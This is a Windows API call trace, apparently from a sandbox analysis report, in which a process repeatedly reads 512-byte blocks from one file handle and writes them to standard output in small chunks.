SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.113] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.114] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.115] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.116] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.117] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.117] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.118] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.124] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.125] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.125] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.126] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.126] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 